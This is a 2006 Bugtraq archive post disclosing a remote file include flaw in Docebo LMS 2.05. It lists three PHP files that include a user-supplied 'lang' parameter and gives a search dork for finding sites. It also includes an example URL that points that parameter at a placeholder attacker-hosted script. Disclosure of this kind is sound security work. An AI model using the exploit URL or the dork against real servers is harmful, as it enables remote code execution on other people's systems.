Bugtraq mailing list archives
Docebo LMS 2.05 Remote File Include
From: beford <xbefordx () gmail com>
Date: Thu, 25 May 2006 15:15:12 -0500
Vulnerable Script: Docebo LMS 2.05 Discovered: beford <xbefordx gmail com> Noobs: %22Based+on+DoceboLMS+2.0%22 Vulnerable Files doceboLMS205/modules/credits/business.php => include($_GET['lang'].'/language.php'); doceboLMS205/modules/credits/credits.php => include($_GET['lang'].'/language.php'); doceboLMS205/modules/credits/help.php => include($_GET['lang'].'/language.php'); http://www.oops.org/DOCEBO205/modules/credits/help.php?lang=http://<evilh4x0rscript>/?
Current thread:
- Docebo LMS 2.05 Remote File Include beford (May 26)